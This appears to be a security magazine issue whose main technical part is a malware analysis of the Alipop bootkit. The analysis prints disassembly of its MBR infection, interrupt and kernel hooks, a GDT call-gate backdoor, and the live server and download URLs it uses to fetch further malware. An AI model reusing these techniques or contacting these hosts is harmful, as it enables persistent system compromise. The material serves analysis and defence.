I've never been one of those who believe that 
there's a one-size-fits-all solution to an or- 
ganization's security issues. The premise 
sounds simply too good to be true, and also - 
could you ever be able to trust one vendor to 
solve all your problems? However, the mar- 
ketplace shows a growing demand for such 
solutions. The frequent mergers and buyouts 
of big market players seem to indicate a defi- 
nite shift into a world where we can expect a 
single solution to be the end of our information 
security problems. 





Herbert Thompson, Chief Security Strategist 
of People Security, talked about a trend where 
many started moving services like e-mail into 
the cloud despite not being clear on all the is- 
sues. Why the move? Everybody else is doing 
it so it must be a good idea and they expect to 
deal with potential drawbacks later. It appears 
that operational efficiency is inspiring risk 
amnesia. 

What small organizations fail to realize is that 
while their size makes them unlikely targets 
for cyber criminal organizations, upon moving 
their data into a cloud that caters for compa- 
nies their size, they become part of a pool. 
Imagine a company with 20 employees that 
does not want to do its own payroll process- 
ing. Not a compelling target, is it? Now picture 
10,000 companies of 20 employees, all using 
a payroll aggregator. Now, that is something 
worth targeting. 

Despite all the problems, the move to the 
cloud is happening on an ever increasing 
scale with each passing year and baby steps 
forward have been made. The cloud evalua- 
tion framework by ENISA, for example, allows 
the business consumer to approach a cloud 
provider and get some level of visibility. 

Economically, we need to push forward and 
find solid solutions for a more effective, effi- 
cient and secure cloud. Can this be achieved 
before the bad guys make a serious dent? 
Only time will tell. 

Facebook: The rise of the privacy killer 

Privacy should be a human right, and we 
should be able to see our data, challenge it, 
change it and delete it. Still, we're not in 
charge of our personal information at all, 
and we have only ourselves to blame. 

As the most significant social network in the 
world, with more than 500 million users dis- 
closing a wealth of information on a daily ba- 
sis, Facebook is a dominant repository of per- 
sonal information. Does Facebook care about 
users' privacy? Absolutely not. 
While discussing Facebook at the RSA Con- 
ference in London, BT Counterpane CTO 
Bruce Schneier was very upfront and said: 
"These CEOs are deliberately killing privacy. 
They have a more valuable market the less 
privacy there is." 

When you think about it, it makes sense for 
them to purposefully erode privacy - it suits 
their business model. How many users are 
complaining? Only a tiny percentage, and 
they're not being loud enough. Most Facebook 
users don't even understand the implications 
of personal data sharing and no one is going 
to warn them until it's too late. 

John Madelin, Director of Professional Serv- 
ices EMEA at Verizon Business agrees. He 
notes that the young always-on generation 
apparently doesn't understand the value of 
data and, even worse, seasoned users are 
making trade-offs just to be in the loop with 
the latest technologies. Increased Facebook 
usage has led to unexpected consequences 
with different types of users using it in different 
ways. Spear phishing has thrived as more 
people opted to open a Facebook account. 




Bruce Schneier on stage for his keynote at RSA Conference Europe 2010. 



One of the biggest gripes by privacy advo- 
cates is the inability for most Facebook users 
to understand how to set up proper privacy 
controls or even the reason why they should 
use them in the first place. Needless to say, 
Facebook is not making it easy for any- 
one, since they are changing the way privacy 
controls are set up quite often. 

"In the end, Facebook will do what's best for 
its customers, and that's not you" said 
Schneier. "People say that Facebook has no 
customer support, but they do, it's just that 
you're not their customer." Naturally, he's right. 
The customers are those placing ads, the data 
hungry wolves looking for advertising so ex- 
quisitely targeted that it was deemed nearly 
impossible just 5 years ago. In this intercon- 
nected world where social media dominates 
the online experience while simultaneously 
dissolving privacy, there is little we can do ex- 
cept avoid using services like Facebook. We 
need regulated privacy laws and controls on a 
higher level in every nation, but is that even 
possible? 



Mirko Zorz is the Editor in Chief of (IN)SECURE Magazine and Help Net Security. 
Security podcasts 



The real ROI of software security activities 

(www.net-security.org/article.php?id=1511) 



At a time when IT budgets are closely examined for cuts that can be lived with, 
a survey among senior executives of 17 companies across the financial serv- 
ices and government sectors reveals whether the benefits of software security 
assurance investments outweigh the drawbacks. In this podcast, Jacob West, 
Director of Security Research at Fortify talks about the real ROI of software se- 
curity activities in the development lifecycle and the results of the survey. 




Developing a secure product lifecycle for Flash content 

(www.net-security.org/article.php?id=1512) 

Peleus Uhley, Platform Security Strategist for Secure Software Engineering at 
Adobe talks about developing a secure product lifecycle for Flash content. By 
enumerating the steps, explaining how to go about executing them, presenting 
tools that can be used and offering his advice on how to avoid typical pitfalls, he 
provides a general checklist that will help any enterprise keep Flash content on 
its website secure. 



Application security: The good, the bad and the ugly 

(www.net-security.org/article.php?id=1515) 




Veracode has tested over 2,900 applications using its cloud-based platform, em- 
ploying static and dynamic analysis (web scanning) and manual penetration test- 
ing to get the answer to that question. In this podcast, Chris Eng, Senior Director 
of Security Research at Veracode and leader of its research lab, talks about the 
good, the bad and the ugly facts that the company's latest State of Software 
Security Report has brought to light. 
How to sell security to senior management 

(www.net-security.org/article.php?id=1516) 



While companies know they have to invest in IT to do their jobs, IT security al- 
ways ends up looking like an added cost in the eyes of the management. So, 
what are the things you need to learn about the company you're pitching to 
before you get through the door? 

In this podcast, Brian Honan, Principal Consultant at BH Consulting and foun- 
der and head of the Irish CERT, emphasizes key points and warns about what 
to avoid when explaining the need for information security to the management. 



Best practices in approaching vendor risk assessment 

(www.net-security.org/article.php?id=1518) 

When it comes to vendor risk assessment, a one-size-fits-all approach is not 
the way to go. Every vendor you bring into your organization will add its own 
unique set of risks and vulnerabilities, and you should assess them on an indi- 
vidual basis. In this podcast, Garrett Felix, Information Security Officer for 
MediFit talks about the pitfalls typical for the assessment process and how to 
avoid them. 



Large scale study of SSL configurations 

(www.net-security.org/article.php?id=1505) 

Ivan Ristic is the director of engineering at Qualys and principal author of Mod- 
Security, the open source web application firewall. In this podcast, Ivan talks 
about the Qualys SSL Labs Internet-wide SSL survey and their recent release 
of the raw data from the survey. 

The raw data contains the SSL assessment results of about 850,000 domain 
names. The main file (120 MB compressed, 800 MB uncompressed) is a dump 
of the PostgreSQL database in CSV format. Included in the download is a 
simple PHP script that iterates through all the rows. 
Authors: Jayson E. Street, Kent Nabors, Brian Baskin | Pages: 360 | Publisher: Syngress 



Dissecting the Hack: The F0rb1dd3n Network 
approaches the subject of hacking in an inter- 
esting way. 

Part fiction, part reference manual, its target 
audience is people who want to or should 
know more about information security, but 
can't keep their attention on the subject for 
long enough to learn or can't translate techni- 
cal details into a believable, realistic scenario. 

About the authors 

Jayson E. Street is a current member of the 
Board of Directors for the Oklahoma "Infra- 
Gard", VP for ISSA OKC and has been a long- 
time member of the Netragard "SNOsoft" re- 
search team. Former consultant with the FBI 
and Secret Service on attempted network 
breaches, he is a well-known information se- 
curity speaker at a variety of conferences, and 
the co-founder of ExcaliburCon. 

Kent Nabors is a VP of Information Security 
for a multibillion dollar financial institution. His 
background includes security policy develop- 
ment, systems implementation, incident re- 
sponse, and training development. 

Brian Baskin is a digital forensics professional 
employed by CSC and serves as the Deputy 
Lead Technical Engineer with the Defense 
Cyber Investigations Training Academy. He 
devotes much of his time to researching 
evolving Internet crimes, network protocol 
analysis, and Linux and Unix intrusion re- 
sponses. 

Inside the book 

This book consists of two parts, and both tell 
the same story. 

The first part - called "The F0rb1dd3n Net- 
work" - is a short (some 125 pages long) 
thriller that sees Bob and Leon, two kids with 
plenty of knowledge about the digital world, 
get caught up in a rather realistic case that 
starts as industrial espionage and ends as... 
well, you'll have to discover it for yourself. 

The second part has been titled "Security 
Threats Are Real", and is a companion piece 
to the first part. In it, tools and techniques 
used by the characters in the fictional part are 
explained, and details, resources and refer- 
ences are given so that the reader can see 
that all these things are possible in the real 
world - and, hopefully, have that realization 
sink in. 

www.insecuremag.com 

You can read the book in any way you want. 
Fiction first, then the reference manual - or the 
other way around. You can also wade through 
both of them simultaneously. If you're already 
somewhat familiar with concepts such as log 
analysis, wardriving, wireless scanning, 
authentication security, traffic obfuscation and 
the like, you can read the fiction part first and 
then go through the manual after that. 

But, if these words make you draw a blank, I 
would recommend reading the story and stop- 
ping to check each reference when it pops up. 
When that happens, you'll be offered a page 
number that tells you which part of the manual 
to consult to understand what the characters 
are doing or talking about. This way, the hap- 
penings in the story will hopefully keep you 
interested enough to search for the answers in 
the back of the book. 

Final thoughts 

I remember when this book first came out last 
year, and was almost immediately pulled be- 
cause it turned out that the technical editor 
plagiarized most of the STAR section. But, I'm 
glad to see that the authors weren't side- 
tracked by this unfortunate event and pro- 
duced - along with a new technical editor - a 
really good book. 

This book delivers on what it promises to do, 
and is perfect for those who are only starting 
out to learn more about the subject of informa- 
tion security. The references and the explana- 
tions in the STAR section offer technical de- 
tails but they do it in a very comprehensible 
way, which should please the readers. 

As far as experienced security professionals 
go, they can pick up the book as a fun, short 
piece of fiction, but I doubt they will learn 
something they didn't already know. 



Zeljka Zorz is the News Editor for Help Net Security and (IN)SECURE Magazine. 
Bootkits - a new stage of development 

by Dmitry Oleksyuk 



Bootkits are malicious programs that take control of the computer by infect- 
ing the hard disk's master boot record (MBR) before the operating system loads. 

The first malicious bootkit ever detected was called Sinowal or Mebroot. It ap- 
peared in 2007 and was rather innovative for that time. But, for whatever rea- 
son, malware developers failed to warm up to this particular infection 
technique, and for three years we have seen practically no new bootkits. 
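As an added example (not the author's code), the check a defender runs against the layout just described: parse a 512-byte MBR image, verify the 0x55AA boot signature, read the partition table, and compare the 440-byte boot code region with a hash recorded when the disk was known clean. The offsets are the standard MBR layout; the sample MBR bytes are constructed for the demo.

```python
"""MBR integrity check: parse a 512-byte master boot record (MBR) and compare its
boot code with a hash taken when the disk was known to be clean.

Added example for this article, not the author's code. Offsets follow the standard
MBR layout; the sample MBRs at the bottom are constructed for the demo.
"""
import hashlib
import struct
from dataclasses import dataclass
from typing import Dict, List

MBR_SIZE = 512
BOOT_CODE_SIZE = 440      # bytes 0..439: boot code, loaded and run from 0000:7C00h
DISK_SIG_OFF = 440        # 4-byte disk signature + 2 reserved bytes (excluded from hash)
PART_TABLE_OFF = 446      # four 16-byte partition entries
BOOT_SIG_OFF = 510        # 0x55AA marker the BIOS checks before jumping to 7C00h
ENTRY_FMT = "<B3sB3sII"   # status, CHS start, type, CHS end, LBA start, sector count


@dataclass
class PartitionEntry:
    bootable: bool
    type_id: int
    lba_start: int
    sector_count: int


def parse_partition_table(mbr: bytes) -> List[PartitionEntry]:
    """Return the non-empty entries of the four-slot partition table."""
    entries = []
    for i in range(4):
        status, _, type_id, _, lba, count = struct.unpack_from(
            ENTRY_FMT, mbr, PART_TABLE_OFF + 16 * i)
        if type_id == 0:                      # empty slot
            continue
        entries.append(PartitionEntry(status == 0x80, type_id, lba, count))
    return entries


def boot_code_sha256(mbr: bytes) -> str:
    """Hash of the region a bootkit has to overwrite to gain control at boot."""
    return hashlib.sha256(mbr[:BOOT_CODE_SIZE]).hexdigest()


def check_mbr(mbr: bytes, baseline_sha256: str) -> Dict[str, object]:
    """Compare a captured MBR against the baseline hash of its boot code."""
    if len(mbr) != MBR_SIZE:
        raise ValueError(f"expected a {MBR_SIZE}-byte MBR, got {len(mbr)} bytes")
    parts = parse_partition_table(mbr)
    digest = boot_code_sha256(mbr)
    return {
        "signature_ok": mbr[BOOT_SIG_OFF:] == b"\x55\xaa",
        "boot_code_sha256": digest,
        "boot_code_modified": digest != baseline_sha256,
        "partitions": parts,
        "bootable_count": sum(p.bootable for p in parts),
    }


def build_sample_mbr(boot_code: bytes, entries: List[PartitionEntry]) -> bytes:
    """Assemble a constructed MBR for the demo (not an image of a real disk)."""
    if len(boot_code) > BOOT_CODE_SIZE:
        raise ValueError("boot code does not fit in the 440-byte region")
    buf = bytearray(MBR_SIZE)
    buf[:len(boot_code)] = boot_code
    buf[DISK_SIG_OFF:PART_TABLE_OFF] = b"\x12\x34\x56\x78\x00\x00"  # constructed disk signature
    for i, e in enumerate(entries[:4]):
        struct.pack_into(ENTRY_FMT, buf, PART_TABLE_OFF + 16 * i,
                         0x80 if e.bootable else 0x00, b"\0\0\0",
                         e.type_id, b"\0\0\0", e.lba_start, e.sector_count)
    buf[BOOT_SIG_OFF:] = b"\x55\xaa"
    return bytes(buf)


# Constructed stub boot code: cli / xor ax,ax / mov ds,ax / mov ss,ax / mov sp,7C00h / sti / hlt.
CLEAN_CODE = b"\xfa\x31\xc0\x8e\xd8\x8e\xd0\xbc\x00\x7c\xfb\xf4"
# Constructed tampered variant: any byte-level change in the region must be caught.
TAMPERED_CODE = b"\x90\x90" + CLEAN_CODE
NTFS_PART = [PartitionEntry(bootable=True, type_id=0x07, lba_start=2048, sector_count=204800)]

CLEAN_MBR = build_sample_mbr(CLEAN_CODE, NTFS_PART)
TAMPERED_MBR = build_sample_mbr(TAMPERED_CODE, NTFS_PART)
BASELINE_SHA256 = boot_code_sha256(CLEAN_MBR)   # recorded while the disk was known clean

if __name__ == "__main__":
    for name, image in (("clean", CLEAN_MBR), ("tampered", TAMPERED_MBR)):
        r = check_mbr(image, BASELINE_SHA256)
        print(f"{name}: signature_ok={r['signature_ok']} "
              f"boot_code_modified={r['boot_code_modified']} "
              f"bootable_partitions={r['bootable_count']}")
```

Against a live system, the input to `check_mbr` is the first 512 bytes read from the raw disk device, and the baseline hash is stored off-host so that a bootkit cannot rewrite both at once.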



Several malicious bootkits appeared recently, 
signaling perhaps that this particular tech- 
nique is finally on its way to becoming popular. 

This article reviews the new bootkit classes. Par- 
ticular focus is put on how boot code works, 
because this issue was only ever covered in a 
2005 report 
(www.blackhat.com/presentations/bh-usa-05/bh-us-05-soeder.pdf) 
on the concept of eEye BootRoot technology. 

Technical tools for bootkit analysis 

A bootkit's code is impossible to analyze with 
your typical kernel mode debuggers, since it is 
executed at the moment the BIOS transfers 
control to the boot sector, before the operating 
system and any kernel debugger are loaded. 

The debugging of boot code is possible only 
via virtual machines with executable code de- 
bugging capabilities, and at the moment such 
functionality is available on QEMU and Bochs 
virtual machines. 

Debugging via QEMU 

QEMU is free open source software. Its func- 
tionality includes emulation of x86, x86-64 and 
other CPUs, and emulation of I/O devices. It is 
possible to debug emulated code with a GDB 
debugger, as is thoroughly described in the 
QEMU documentation (tinyurl.com/2urdt8x). 

It is the author's opinion that it's better to use 
the debugger of IDA Pro disassembler (from 
version 5.4). Setting up a debugger and a vir- 
tual machine is described in IDA Pro docu- 
mentation (tinyurl.com/37ga5r9). 

Let's address some features of boot code 
debugging. 
Figure 1. Using GDB along with QEMU. The GDB session shown in the figure: 

    (gdb) target remote 127.0.0.1:1234 
    Remote debugging using 127.0.0.1:1234 
    0x0000fff0 in ?? () 
    (gdb) break *0x7c00 
    Breakpoint 1 at 0x7c00 
    (gdb) c 
    Continuing. 
    Breakpoint 1, 0x00007c00 in ?? () 



When the debugger is connected to a virtual 
machine and a session is initialized, it is nec- 
essary to set a hardware breakpoint at the 
address 0000:7C00h, since boot code starts 
its execution from this address. Then open the 
Breakpoints tab and choose Insert from the 
drop-down menu: 



Figure 2. Add new breakpoint in IDA Pro (Breakpoint settings dialog: Address 0x7c00, Enabled, Hardware breakpoint; Size; Modes: Read/Write, Write, Execute; Condition; Actions: Break, Trace). 



Code execution can be continued (F9) after 
adding the breakpoint. 

Note that, once the breakpoint is hit, the seg- 
ment settings must be edited manually in order 
to debug 16-bit code. To do that, open Edit -> 
Segments -> Edit Segment in the main menu 
and set the 16-bit addressing mode for the cur- 
rent segment: 
Figure 3. Segment settings in IDA Pro (Change segment attributes dialog: segment name MEMORY, class UNK, start address 0x0, end address 0xFFEFFFFF, 16-bit segment selected, combination public, alignment byte). 
Then you can open the code analysis window and analyze boot sector code. 



Figure 4. Debugging of boot code in IDA Pro (IDA View-EIP window showing the boot sector disassembly at MEMORY:7C00). 
Debugging via Bochs 

Bochs - Free open source software. Its func- 
tionality includes emulation of x86/x86-64 
CPUs and emulation of I/O devices. 

Since Bochs interprets every instruction of the 
virtual CPU, it is notable for its high emulation 
precision. For the same reason, Bochs' per- 
formance is poorer than that of popular virtual 
machines like VMware and VirtualBox and of the 
above-described QEMU. It is advisable to 
have an image of a hard disk with an installed 
OS ready before starting Bochs; such an image 
can be made with the QEMU emulator. 

The Bochs debugger is a standalone applica- 
tion (bochsdbg.exe), which shows a dialog 
window offering the possibility to change the vir- 
tual machine settings and to restore or save its 
configuration. 



Figure 5. Bochs start menu (Configuration: Load, Save, Edit, Reset; Edit Options: Logfile, Log Options, CPU, CPU ID, Memory, Clock & CMOS, PCI, Display & Interface, Keyboard & Mouse, Disk & Boot, Serial/Parallel/USB; Simulation: Start, Restore State, Quit). 



Starting the virtual machine opens a debugging 
console with a small but sufficient set of com- 
mands, which can be listed with the help com- 
mand. 

Enter "lb 0x7c00" to set a breakpoint at the 
beginning of boot code execution and "c" to 
continue code execution. 



00001834543i[BIOS ] SMBIOS table addr=0x000fbd00
00001836931i[BIOS ] ACPI tables: RSDP addr=0x000fbe20 ACPI DATA addr=0x01ff0000 size=0x988
00001840169i[BIOS ] Firmware waking vector 0x1ff00cc
00001851282i[PCI  ] 440FX PMC write to PAM register 59 (TLB Flush)
00001852126i[BIOS ] bios_table_cur_addr: 0x000fbe44
00001864443i[BIOS ] ata0-0: PCHS=20/16/63 translation=none LCHS=20/16/63
00005744671i[BIOS ] IDE time out
00017825010i[BIOS ] Booting from 0000:7c00
(0) Breakpoint 1, 0x0000000000007c00 in ?? ()
Next at t=17825071
(0) [0x00007c00] 0000:7c00 (unk. ctx): xor ax, ax                ; 31c0
<bochs:3> u /10
00007c00: (                    ): xor ax, ax                ; 31c0
00007c02: (                    ): mov ds, ax                ; 8ed8
00007c04: (                    ): mov es, ax                ; 8ec0
00007c06: (                    ): mov ss, ax                ; 8ed0
00007c08: (                    ): mov sp, 0x7c00            ; bc007c
00007c0b: (                    ): mov si, 0x7c00            ; be007c
00007c0e: (                    ): mov di, 0x0600            ; bf0006
00007c11: (                    ): mov cx, 0x0080            ; b98000
00007c14: (                    ): nop                       ; 90
00007c15: (                    ): nop                       ; 90
<bochs:4>
Analysis of new bootkits 

Backdoor.Win32.Trup.a (Alipop) 

Alipop appeared around May 2010. Judging 
by the pop-up ads and the Chinese-language 
adware, its developers are Chinese. 

Self-defense 

This Trojan doesn't use any techniques to 
avoid proactive defense. However, the code of 
most of its procedures is protected against 
reverse engineering with an old but effective 
method: real processor instructions are hidden 
inside a long chain of opcodes that the disas- 
sembler interprets as a false instruction. 



.text:0040546D                 call    FindFirstFileA
.text:00405473                 cmp     eax, 0FFFFFFFFh
.text:00405476                 jz      short loc_405492
.text:00405478                 jz      near ptr loc_405484+1
.text:0040547E                 jnz     near ptr loc_405484+1
.text:00405484
.text:00405484 loc_405484:
.text:00405484                 call    near ptr 4248F1h
.text:00405489                 add     bh, bh
.text:0040548B                 adc     eax, offset Sleep
.text:00405490                 jmp     short loc_40545F



The code presented above is executed in this way: 



.text:0040546D                 call    FindFirstFileA
.text:00405473                 cmp     eax, 0FFFFFFFFh
.text:00405476                 jz      short loc_405492
.text:00405478                 jz      loc_405485
.text:0040547E                 jnz     loc_405485
.text:0040547E
.text:00405484                 db 0E8h
.text:00405485
.text:00405485 loc_405485:
.text:00405485                 push    1F4h
.text:0040548A                 call    Sleep
.text:00405490                 jmp     short loc_40545F



As you can see from this listing, the 5-byte call 
instruction at 00405484 is never executed, be- 
cause the preceding conditional jumps always 
pass control to 00405485, where the push in- 
struction is located. This method hinders code 
analysis in the IDA disassembler and makes it 
impossible to decompile the code with Hex- 
Rays without pre-processing. 

Installer 

The bootkit's installer is an executable file of 
about 24 kB (MD5: 
3f5cff08b83a0a9ad5f8e0973b77a2ac) and 
contains all the other bootkit components. 

Executing the installer creates and launches 
the file C:\WINDOWS\ali.exe (MD5: 
570e6e5c1d0c95c5a446f6f62fa90468, about 
17 kB), which holds the main operational code 
of the Trojan. 

To maintain auto-loading, the installer writes 
the bootkit's code into the first 40 sectors of the 
HDD: 

"CreateFile", "\Device\Harddisk0\DR0", "Desired Access: Generic Read/Write, Disposition: Open"
"ReadFile", "\Device\Harddisk0\DR0", "Offset: 0, Length: 20,480, I/O Flags: Non-cached"
"WriteFile", "\Device\Harddisk0\DR0", "Offset: 0, Length: 20,480, I/O Flags: Non-cached"
"CloseFile", "\Device\Harddisk0\DR0"






Figure 7. Infected MBR (hex dump of the 512-byte mbr.bin viewed in Far). 



The bootkit's code is called at the next system 
launch. 

Executable code 

First of all, the bootkit's executable code re- 
serves 20 kB of base memory. For this purpose 
it decreases the base memory size stored in the 
BIOS variable at 0040h:0013h. 

The bootkit's components are then fetched from 
the first 40 HDD sectors into the reserved area 
with function 2 of interrupt 13h, and control is 
transferred to the fetched code. 



seg000:001F                 pushad
seg000:0021                 push    ds
seg000:0022                 mov     bx, word ptr cs:0413h
seg000:0027                 sub     bx, 14h                 ; reserve 20 kB of the memory
seg000:002B                 and     bl, 0FCh
seg000:002E                 mov     word ptr cs:0413h, bx
seg000:0033                 shl     bx, 6                   ; calculate linear address of reserved sector
seg000:0036                 mov     es, bx
seg000:0038                 xor     bx, bx
seg000:003A                 mov     ax, 228h                ; read first 40 sectors
seg000:003D                 mov     cx, 1
seg000:0040                 mov     dx, 80h
seg000:0043                 int     13h
seg000:0045                 push    es
seg000:0046                 push    4Ah                     ; transfer control to fetched code by 4Ah offset
seg000:0049                 retf


The code and data read in from offset 83h on- 
wards are ciphered with the reversible ROR op- 
eration, so they are deciphered first. 

After deciphering, the bootkit intercepts BIOS 
interrupt 13h, which lets it control read opera- 
tions during the first stages of system launch. 

Finally, the original OS loader, which the boot- 
kit's installer saved in sector 39, is called. 
seg000:0083                 mov     eax, dword ptr es:004Ch     ; save original int 13h handler
seg000:008B                 mov     dword ptr cs:0DF1h, eax
seg000:0090                 and     dword ptr es:004Ch, 0
seg000:0097                 or      word ptr es:004Ch, 0E6h     ; set new handler address
seg000:009E                 mov     word ptr es:004Eh, cs       ; set new handler selector
seg000:00A3                 xor     ebx, ebx
seg000:00A6                 mov     bx, cs
seg000:00A8                 shl     ebx, 4

seg000:00C5                 mov     di, 7C00h
seg000:00C8                 push    cs
seg000:00C9                 pop     ds
seg000:00CA                 mov     si, 4C00h
seg000:00CD                 mov     cx, 200h
seg000:00D0                 cld
seg000:00D1                 rep movsb                           ; copy original boot sector to 7C00h
seg000:00D3                 pop     ds
seg000:00D4                 popad
seg000:00D6                 lss     sp, dword ptr es:0602h      ; restore sp
seg000:00DC                 mov     es, word ptr es:0600h       ; restore es
seg000:00E1                 jmp     far ptr 0:7C00h             ; execute original boot code

Interrupt 13h is hooked in order to modify the 
code of the OSLOADER.EXE module while it is 
being read from the system partition. 
OSLOADER.EXE is a part of the NTLDR 
module and is executed in protected mode. 

The goal of this modification is to execute the 
bootkit's code in protected mode, too. The 
OSLOADER.EXE code to be modified is 
searched for by signature in the buffer of 
fetched data after the interrupt has been proc- 
essed: 



seg000:0120                 mov     di, bx                  ; di - pointer to buffer with data
seg000:0122                 mov     al, 8Bh                 ; first byte of the signature
seg000:0124                 cld
seg000:0125
seg000:0125 loc_125:
seg000:0125                 repne scasb
seg000:0127                 jnz     short loc_159
seg000:0129                 cmp     dword ptr es:[di], 74F685F0h ; bytes 2-5 of the signature
seg000:0131                 jnz     short loc_125
seg000:0133                 cmp     word ptr es:[di+4], 8021h    ; bytes 6-7
seg000:0139                 jnz     short loc_125
seg000:013B                 push    es
seg000:013C                 xor     eax, eax
seg000:013F                 mov     es, ax
seg000:0141                 mov     ax, cs
seg000:0143                 shl     eax, 4
seg000:0147                 add     eax, 200h
seg000:014D                 pop     es
seg000:014E                 mov     word ptr es:[di-1], 15FFh    ; write instruction call dword ptr [addr]
seg000:0154                 mov     es:[di+1], eax





OSLOADER code is the following set of instructions: 

.text:00422B77                 call    _BlLoadBootDrivers@12
.text:00422B7C                 mov     esi, eax
.text:00422B7E                 test    esi, esi
.text:00422B80                 jz      short loc_422BA3
.text:00422B82
.text:00422B82 loc_422B82:
.text:00422B82                 cmp     _BlRebootSystem, 0
.text:00422B89                 jz      short loc_422B92
This fragment belongs to the _BlOsLoader@12() 
function. The bytes being modified follow the 
call of the _BlLoadBootDrivers@12() function, 
which loads the drivers of system services with 
the SERVICE_BOOT_START start type into 
memory. The modification is a call instruction 
that transfers control to the resident bootkit's 
code in reserved base memory at offset 200h. 
Therefore the bootkit's code gets control when 
the CPU is in 32-bit protected mode. 

Protected mode code 

The bootkit's protected mode code starts its 
execution by obtaining the kernel load address. 
This address is read from the first record in the 
list of loaded modules; this record is a 
LDR_DATA_TABLE_ENTRY structure. A 
pointer to the list of loaded modules can be 
obtained from the global variable _BlLoader- 
Block of the OSLOADER.EXE module. In par- 
ticular, the _BlLoaderBlock variable contains a 
pointer to the _LOADER_PARAMETER_BLOCK 
structure. A copy of this pointer is used as a 
local variable in the code of the 
_BlAllocateDataTableEntry@16() function, and 
the bootkit uses a signature to find this section 
of the code. Moreover, the virtual address of 
the memory that is used to load NTLDR and 
other system modules is read from the local 
variable KdDllBase. The modified function 
_BlOsLoader@12() refers to this variable by a 
fixed offset from ebp: 



seg001:00000206                 mov     edi, [esp+24h]          ; edi - value of KdDllBase variable
seg001:0000020A                 and     edi, 0FFF00000h
seg001:00000210                 cld
seg001:00000211                 mov     al, 0C7h                ; first byte of the signature to search for _BlLoaderBlock
seg001:00000213
seg001:00000213 loc_213:
seg001:00000213                 scasb
seg001:00000214                 jnz     short loc_213
seg001:00000216                 cmp     dword ptr [edi], 400034??h ; other 4 bytes of the signature (low digits unreadable in the source)
seg001:0000021C                 jnz     short loc_213
seg001:0000021E                 mov     al, 0A1h
seg001:00000220
seg001:00000220 loc_220:
seg001:00000220                 scasb
seg001:00000221                 jnz     short loc_220
seg001:00000223                 mov     esi, [edi]              ; esi - pointer to the list of loaded modules
seg001:00000225                 mov     esi, [esi]              ; esi - pointer to the first _LDR_DATA_TABLE_ENTRY
seg001:00000227                 lodsd
seg001:00000228                 mov     ebx, [eax+18h]          ; ebx - kernel load address
seg001:0000022B                 call    sub_267

The procedure sub_267 is used to intercept 
the kernel function nt!IoGetCurrentProcess() 
in such a way that its call transfers control to 
the bootkit's code of the next (third) stage, 
which has to be executed in 32-bit protected 
mode after OS kernel initialization. 



seg001:00000267                 pop     esi                     ; get bootkit's code address by return address
seg001:00000268                 mov     ecx, 37h
seg001:0000026D                 mov     [esi+2B6h], ebx
seg001:00000273                 lea     edi, [ebx+40h]
seg001:00000276                 mov     ebp, edi
seg001:00000278                 rep movsb                       ; copy bootkit's code by offset 0x230-0x267 in the header of kernel image over DOS stub
seg001:0000027A                 push    0CE8C3177h
seg001:0000027F                 call    GetProcByHash           ; get IoGetCurrentProcess address by a hash of the name
seg001:00000284                 xchg    eax, esi
seg001:00000285                 sub     edi, 0Ah
seg001:0000028B                 movsd                           ; save first 5 bytes of the function
seg001:0000028C                 sub     edi, 6
seg001:00000292                 movsb
seg001:00000293                 mov     byte ptr [esi-5], 0E8h
seg001:00000297                 sub     ebp, esi
seg001:00000299                 mov     [esi-4], ebp            ; patching modification of IoGetCurrentProcess by its call at nt+0x40 address
The first call of the nt!IoGetCurrentProcess() function is usually performed after kernel initialization 
by the nt!Phase1Initialization() function: 

kd> kb
ChildEBP RetAddr  Args to Child
f9dc35f0 80688d7e 8195c338 8008ecb8 8008ecb8 nt+0x4d
f9dc3630 8068ac22 8195c3ec 8008ecb8 0000000c nt!IopInitializeBuiltinDriver+0x260
f9dc3634 80687b48 80082000 f9dc36b0 00034000 nt!IopInitializeBootDrivers+0x2d2
f9dc383c 80685fdd 80082000 00000000 819cc838 nt!IoInitSystem+0x712
f9dc3dac 805c6160 80082000 00000000 00000000 nt!Phase1Initialization+0x8b8
f9dc3ddc 80541dd2 80685628 80082000 00000000 nt!PspSystemThreadStartup+0x34
00000000 00000000 00000000 00000000 00000000 nt!KiThreadStartup+0x16
kd> u nt!IoGetCurrentProcess
nt!IoGetCurrentProcess:
804ee608 e8338afeff      call    nt+0x40 (804d7040)
804ee60d 008b4044c3cc    add     byte ptr [ebx-333CBBC0h],cl
804ee613 cc              int     3
804ee614 cc              int     3
804ee615 cc              int     3
804ee616 cc              int     3
804ee617 cc              int     3


Bootkit execution after kernel initialization 

The hook handler of nt!IoGetCurrentProcess() 
restores the original code of the function and 
calls nt!PsCreateSystemThread() to launch a 
system thread which executes the bootkit's 
operational code. The operational code per- 
forms the following: 

• Creates a string value in the registry key 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 
with the data C:\WINDOWS\ali.exe, so that the 
Trojan is launched after the system starts. 

• Creates the C:\WINDOWS\ali.exe file. Its con- 
tent is written to the system from sector 4 of 
the HDD, where the installer placed it during the 
bootkit installation. 

• Installs a GDT call gate, which makes it possi- 
ble for any user mode code to execute any in- 
struction with the highest privilege level. 



Figure 8. GDT call gate (backdoor). The GDT dump shows entry 124 (+0x3E0) with type 00C (32-bit call gate), address 0x800003E8 and DPL_SYSTEM; the neighbouring entries 123 (+0x3D8), 125 (+0x3E8) and 126 (+0x3F0) are reserved. 



Therefore the Alipop developers gave up the 
traditional method of using a kernel mode 
driver to execute privileged instructions. In- 
stead, they used a trick that lets a user mode 
process achieve the same goal. This is a sim- 
pler but less stealthy approach. 

It is also possible that this bootkit was devel- 
oped as a universal tool for launching, from the 
boot sector, any malicious software that runs 
in user mode. 



Trojan process 

The main goal of the ali.exe process is to re- 
ceive commands to download and launch 
other malicious software from the server. 

Sending HTTP requests is performed via 
Internet Explorer, which is launched in a hid- 
den window. 
Figure 9. Trojan process (Process Explorer view showing the iexplore.exe processes launched under explorer.exe). 



Hypertext Transfer Protocol
GET /sms/xxx.ini HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: list.577q.com
Connection: Keep-Alive

Figure 10. Request configuration file from server. 



The Trojan's ciphered configuration file is 
downloaded from a server with the fixed ad- 
dress http://list.577q.com/sms/xxx.ini and is 
saved in the C:\WINDOWS directory under the 
name win.ini. An example of the configuration 
file content: 



[DownLoad]
exe1=coopen_setup_100201.exe-5.0|http://download.coopen.cn/setup/v5/coopen_setup_100201.exe
exe2=pptv(pplive)jixian_113459_s.exe-1.0|http://60.173.10.28:«21/pptv(pplive)jixian_113459_s.exe
[Homepage]
home=http://www.67ku.com
[Time]
